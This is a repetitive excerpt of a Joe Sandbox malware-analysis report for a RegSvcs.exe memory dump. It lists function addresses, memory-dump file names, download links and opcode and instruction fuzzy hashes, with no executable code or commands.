Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8677d419326b9159cff730c29fde8bddbdc93c4bd672cb828ee83875dda7b277
Instruction ID: 51c785ed2849feceee3fb27c7cc7af88010a55ed542e662a7f144f6d26d740f7
Opcode Fuzzy Hash: 8677d419326b9159cff730c29fde8bddbdc93c4bd672cb828ee83875dda7b277
Instruction Fuzzy Hash: 8731A472E01219EFDB79DEA9C840AAEFBF9EF44750F014426E925E7250D3709B018BA1

Function 011307AF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ce6962ed85d03f7ed77376431aaacc88cf206547ea42d7cc721f8bfc965dd13
Instruction ID: d712c03e447e6331c1c46b6560002ba7a111da3e67f140d2b3e31ecdab164c11
Opcode Fuzzy Hash: 4ce6962ed85d03f7ed77376431aaacc88cf206547ea42d7cc721f8bfc965dd13
Instruction Fuzzy Hash: 8F31C532E05612DBC71EDE288880A6BBBE5AFD8664F02456DFD55A7318DB30DC1187E2

Function 011ACA72 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23eb32f864f4ef7b8f633a1f8b7efcbd0f6934e49b67d026b72701b3ef28bd6f
Instruction ID: 3611cdd8d8adc6ae1756e34b1b75b6ecf62195e3107c054690d69c74b1dd8bdd
Opcode Fuzzy Hash: 23eb32f864f4ef7b8f633a1f8b7efcbd0f6934e49b67d026b72701b3ef28bd6f
Instruction Fuzzy Hash: DD31037A900519AFEB1DDB58C851FBFFF74EB807A0F414129A911A7250D7319E00DBE0

Function 0116A6C7 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e136c029909a3ccf1237e4fc7d16277c3fe1d3b2d70fb0f0b3587283bfba0b1c
Instruction ID: 66b67f6451a99f03e19b0f93697970e402a645cc220f9e59b33ecb8e28dd079a
Opcode Fuzzy Hash: e136c029909a3ccf1237e4fc7d16277c3fe1d3b2d70fb0f0b3587283bfba0b1c
Instruction Fuzzy Hash: 0B312CB2B00B01AFD769CF69DD41B57BBFCAF18A50F08452DA59AD3650E735E900CB60

Function 0115438F Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34caaac5d39237be90e821252d5ad0c6ddd290758335b888727d97093615bce0
Instruction ID: 0c6667185d25b152cd08d647264364e3c3d3b86b22427e39c753baf58197fe91
Opcode Fuzzy Hash: 34caaac5d39237be90e821252d5ad0c6ddd290758335b888727d97093615bce0
Instruction Fuzzy Hash: DA31D832B00205DFD768DFA8C984A6F7BF5AB84708F004529D965D7A54E730E985CB91

Function 0112CB7E Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7790bd36a42e865f7c718a67dc22d3f79e787f24dbf99b6834416aa25bbd7ff7
Instruction ID: 5e44a05ef26d193b37a325c124535f89425949b1f7cb10c67ee58a800722849b
Opcode Fuzzy Hash: 7790bd36a42e865f7c718a67dc22d3f79e787f24dbf99b6834416aa25bbd7ff7
Instruction Fuzzy Hash: 22210B35E44267ABD7189BB98410BEFBB75AF54740F068036DE15E7340E370D9108BD1

Function 0112E420 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6f60d842bd35ab516e12ddc5e97821a5a2e311fde1fa25feb0092d988fd2f41
Instruction ID: 9756ab18988a68419f7f09d10a77f6827788fbf1dc8102f325c76794e5862b54
Opcode Fuzzy Hash: c6f60d842bd35ab516e12ddc5e97821a5a2e311fde1fa25feb0092d988fd2f41
Instruction Fuzzy Hash: 2231D132A0217C9BDB39DF18CC41FEEB7B9AB15744F0100A1E645EB290D774AE908FA1

Function 01164588 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 277169c50a7bdf1e1def58b38a3c1dedac02a8c9ac2be01cc5a137e0a7ffea9f
Instruction ID: 9848bcada5134d1c6d01aaaadf208b8a60d209ec4e0a29aaa1416a0e03a5d66d
Opcode Fuzzy Hash: 277169c50a7bdf1e1def58b38a3c1dedac02a8c9ac2be01cc5a137e0a7ffea9f
Instruction Fuzzy Hash: D5217131A00609EBCB19CF58C980A8EBBB9FF48714F108065EE159B641D772EE158B90

Function 011644B0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99dcdd1c8aa9bd9a78a8532e6f32bad5f03256fd063a8aeec594b1670987642d
Instruction ID: 687538f00bf8f59c9c4ec8071fb6bf43bb1561aeb80f655d8dd98dbecf0692ba
Opcode Fuzzy Hash: 99dcdd1c8aa9bd9a78a8532e6f32bad5f03256fd063a8aeec594b1670987642d
Instruction Fuzzy Hash: D521D2726047559BCB2ADF18C880B6B77E8FF88760F014519FD549BA41D731E911CBA2

Function 0112E388 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44134b3cc04c3b9165643a468610c299cbef36331bc2ea93ac49eb48e3b8bc4a
Instruction ID: fc1e25ebbfa99313edf5b2f418d17bd0b1af3652ac8d0256989834ef442a3982
Opcode Fuzzy Hash: 44134b3cc04c3b9165643a468610c299cbef36331bc2ea93ac49eb48e3b8bc4a
Instruction Fuzzy Hash: B8318931600655AFDB29DBA8C884F6AB7F9EF45358F1045A9E552CB290E730EE02CB51

Function 011AE609 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee8d0fe3a1328d70028e0c83485cb84a5186f43dad87848a987a3c6fe7512349
Instruction ID: 6b342059f4a0a014bcc5afc6b6ee46b0347cc7cf0207c22d0dc305c28d5f82bb
Opcode Fuzzy Hash: ee8d0fe3a1328d70028e0c83485cb84a5186f43dad87848a987a3c6fe7512349
Instruction Fuzzy Hash: 1031A279A01205EFCB18CF1CC4849AEBBB6FF84704F554859E8099B391E731EA50CB91

Function 01158CB1 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be42928480fe83a6920f429437d80c1551646c43924c5eabe80f3f6a5d3481a8
Instruction ID: 06f5c59ea9d52fc483c9e1ba7e9493f606f7d8c5db40181eecfbe78d312cb5e1
Opcode Fuzzy Hash: be42928480fe83a6920f429437d80c1551646c43924c5eabe80f3f6a5d3481a8
Instruction Fuzzy Hash: 02212837500115EBDF6A9A8EC840F9F7BF9EF61AA0F064022BD259B210C730CD0087A1

Function 01138D59 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
Instruction ID: 55699d960f2e20ccffcf7cb9c9800c1d1979d93fd8c012c5c98bfe671905abb0
Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
Instruction Fuzzy Hash: 0A212831711681EBEB2ED72CC918B697BF5AF90B54F0A01A4ED628B6D2E374DC40C251

Function 011B06F1 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5375e23de9ac22504386398637eb6db5fe2e83643cc32003a61cca26adc5330
Instruction ID: 47b3b052fed47b76eb5ad194b3cc1ba62e0474405ee950c65fbe333de73337c0
Opcode Fuzzy Hash: c5375e23de9ac22504386398637eb6db5fe2e83643cc32003a61cca26adc5330
Instruction Fuzzy Hash: 6B217C71900629ABCF299F59C881AFEF7F4FF48744B510069F941AB240D778AD42CBA1

Function 011B019F Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 187bd3e6c672c57f8a11b2d3faf62df1b1ffd65ec9bce2137342a04f66531f66
Instruction ID: 9cb711930f58806a7b8bc4da3927a5747b2e033fd81338277efe5d3178cdb962
Opcode Fuzzy Hash: 187bd3e6c672c57f8a11b2d3faf62df1b1ffd65ec9bce2137342a04f66531f66
Instruction Fuzzy Hash: 0F218B71600655ABD719DB68D884BAAB7B8FF48744F140069F944DB7A0D734ED40CB68

Function 011B0283 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e37b2483bc3123b5ad27321519907038400ad4e7aca9cc423b176697c789bd49
Instruction ID: b58e889384f44c900423ffb24ae8c5fd7349bf3d63b003e27b0ddb1376cd7523
Opcode Fuzzy Hash: e37b2483bc3123b5ad27321519907038400ad4e7aca9cc423b176697c789bd49
Instruction Fuzzy Hash: 9B2145729093428FD319EF69C888B9BBBECBF94644F080456FD90C7260D730C908C6A2

Function 01152835 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 428db9713fcd7dc876c741494f8c4897c58f8a20f0d160e9ea93b7981f53fcae
Instruction ID: 7642d1a5b6f95fc92eb619409ce3d41ed5308fdfbe9c815e832cc711e8dde6c4
Opcode Fuzzy Hash: 428db9713fcd7dc876c741494f8c4897c58f8a20f0d160e9ea93b7981f53fcae
Instruction Fuzzy Hash: 40210833705681EBE72E57AC9C44B293BD4AF41B78F290364FE709B6E2DB78C8418241

Function 01136C50 Relevance: .1, Instructions: 73timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01136D8C

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
Instruction ID: fc7c42c7dda9384a42a63fcfe716d2e9f057f78d9356e276e229cb3bc62745b9
Opcode Fuzzy Hash: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
Instruction Fuzzy Hash: 6B319C75600601DFCB29CF58C180B16BBE5FF88724F2584ADE9498B756DB31ED42CB90

Function 0116A30B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba6bb34cff0b0232c63ad58dfb1d11ffea968e88bb4bc0af8e8bcd68977a9263
Instruction ID: 60d3eaf828e4da7a60dfa6b40866447e67e54fa42eb21a3306168591357385eb
Opcode Fuzzy Hash: ba6bb34cff0b0232c63ad58dfb1d11ffea968e88bb4bc0af8e8bcd68977a9263
Instruction Fuzzy Hash: 4721A979210A11AFC729DF29C800B56B7F5BF18B48F248468E559DBB61E371E842CF98

Function 011B0946 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ed4527d55539a3cc56880e562d58f39c62a252ad46f1f1c11df0cd4e1acd4a0
Instruction ID: bbe42cc6d0c65834aca831475c0f87ec76f9b68716b11c449ddb112452239e0a
Opcode Fuzzy Hash: 1ed4527d55539a3cc56880e562d58f39c62a252ad46f1f1c11df0cd4e1acd4a0
Instruction Fuzzy Hash: 4E21E6B1E00219ABDB24DFAAE9849EEFBF9FF98610F10012EE509A7254D7749941CB50

Function 01140BBE Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
